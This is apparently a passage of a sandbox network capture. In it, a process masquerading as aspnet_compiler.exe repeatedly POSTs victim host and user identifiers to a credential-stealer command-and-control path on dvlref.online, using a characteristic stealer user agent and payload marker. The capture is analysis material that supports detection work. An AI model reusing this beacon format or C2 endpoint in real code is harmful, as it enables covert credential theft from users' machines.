Dec 2, 2024 14:47:56.671284914 CET	799	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O5flaIV4cS%2FkDj1zC7XiGC2CnQ3L%2FhxDQuSnzdmpYrHmiO%2FnZPThl6AsZryhlpfASoakD7RhRwGNYykt87N8Ac4%2B%2BGYnuGqhOfasRuuHviSDRn1zuh5INnKAs5ndIPNH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc58caa0c42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1562&rtt_var=781&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	49956	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:57.067392111 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:57.187443018 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:58.467120886 CET	791	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vAR8oqtfoMNQNJXrOdgu5kWdPEw94QtCdsU0AjTX7ObIrtP4pk7zHxrTR8iy4bTFQsBuxSdiNvHiM%2F0jpMtowMdLSoq1dfU2lyAsV702QQhzslxa9XqDuG9kuD8NKTyq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc597acb2436d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1649&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	49961	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:58.741235971 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:58.861617088 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:00.104140043 CET	797	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYRg%2BTAeOQgVX7PPjeYASUpiOROI3VZ20%2F4JP2txUvK6uyQdlHsLr3cieuevwgfcxJUKyIYZ6pKJZ0lzHZjqeH2C7iKA%2FPhoANX%2Fmt4kUpntDOoYEi1ypakgLLPpKoht"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5a2284243df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	49965	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:00.375097990 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:00.495168924 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:01.768826008 CET	801	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xTWtTogKq9x3b74%2B%2FdkfEkfR5Gjs1wYXadZm8ypPJOugZKbI7ufzyPL%2BD4WFssnVOTskO%2F%2BjLb6uj%2F8YAwU6qq4mFkeEhp9849QI5Z2eYvOFgBCZuHYYRdrUjtuF5Py2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5ac6c931835-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	49971	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:02.041645050 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:02.161787987 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:04.695626020 CET	796	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fMeyClhoeuRYpNgGk%2FCTIgJ2OynvuGIr65osAXKblMCrlkyZeoxdiYu5TTufL07XRAeMqEEz%2BPRTlHXn4QNvYZFvl0lvIuoMIcWy%2FJWThJCaklMZUBwBEuZ7f8eq0J2H"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5b7183c9e08-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5398&min_rtt=5398&rtt_var=2699&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	49977	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:04.957745075 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:05.077723026 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:06.371306896 CET	797	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8crs%2FiVJZoV9N%2BFGtoKx%2FJE69Zv9B3hKDywXYXjR61BOZY2oo5VoGq0aaWTgwm7p8eAixx5oJgsmfs5172sg5%2BfKRLecWuuIu2uMjhUxPoFXMxQIzfAABaFUk0dtboUQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5c94b1b1869-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1610&rtt_var=805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	49983	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:06.629559040 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:06.749600887 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:08.003021955 CET	797	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLA0Ax1lEnhWD%2BXj%2FJDwLeXjXQShl%2Be2TUP7z9PqBEYAfSiO6rZU8zNStTH7EmSU2L2%2B3QNjN0ivjp2vlybdW3mc2mygEazE2kEGvPpBsftL6cpvFW5aIz2zbV01Ql8y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5d37f188cba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1850&min_rtt=1850&rtt_var=925&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	49988	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:08.281708956 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:08.405253887 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:09.590373039 CET	793	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yRv%2BlbJFZakoqDkA1kIn8Y9XqfroC8aGrc%2B5tezhHv5B7dWW0cFXZjGzv4a6t8jXuvmMf091eblqa54V99ooclsGg71FBH6NP0DBhupVsPIjIuOvQiU3hKpvVBJJksAZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5dd899143e0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1744&rtt_var=872&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	49992	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:09.848752975 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:09.969316959 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:11.277231932 CET	803	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fYKtqjyeZ3e%2B%2FbAQr2aiy2cjKqXALHVAcD4S6mavlFv%2FlcCrQD%2FIxgQ%2FSBCKSUZ7TcuSisN1mek1GlxowZWwYb7arBR4lPRRn5PIu6lMjGqf2JRAP1jYCkV4TY0uABYr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5e7e96e4210-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=32356&min_rtt=32356&rtt_var=16178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	49995	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:11.535180092 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:11.655286074 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:12.842406034 CET	795	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H8K%2FzMXBw09wxU1WS%2BF%2BGnGOiuHkSRsZtuISNyFPjGR0akUXSgTIfEuWrwNIDxUiUvshgk4zUVmFxYWGAua7oWbC6Uh74tLLHAhOwaX2F5sbcLdBm9djzkn5zOEzABL4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5f1ea101831-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1648&rtt_var=824&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.7	50001	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:13.116568089 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:13.236850977 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:14.454298019 CET	798	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIp6uCmmptqBTKHOLjWTyaw0M5MpVBqKA2MrBRZkcC%2FCqUUz9kW%2Fccb1O3nVOR%2Fh74hHVW%2F5asDmPxHttdehEhETGBh28o3tjOQkwKHnRIUoxFFzpgFjAFNSIyFeGJaA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc5fc0cc86a59-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2493&min_rtt=2493&rtt_var=1246&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	50004	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:14.878838062 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:14.998847008 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:16.226205111 CET	794	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c18etN%2BJXMLJc7QknYiL8XaSz%2FzxhyHIbIBtirCWy1hqah7rYPhZeZUohdUvDlBePR9M7sx7Po2FH6jWjrCuIxpjytYdkdCK6s9WlHlKLKcAq%2By1SKS0gJxaQjkfWaSX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc606c96d5e74-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1747&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=95&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.7	50006	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:16.488158941 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:16.608052015 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:48:17.868932962 CET	799	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:48:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gE6M7G7JY8cpmYXn3mBOWVPBzk%2FHbkSQbvFdjw247j4AnJRFyOhL6MF9o%2BUZZOoVuFyWY%2FXuGgsuOs%2Bjr7fMid6YYHVbK9oOYik%2Fitjs11JSmcvHv3jJWOSdfKl3LUUx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc61118904370-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1714&rtt_var=857&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.7	50012	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:48:18.174500942 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:48:18.296109915 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
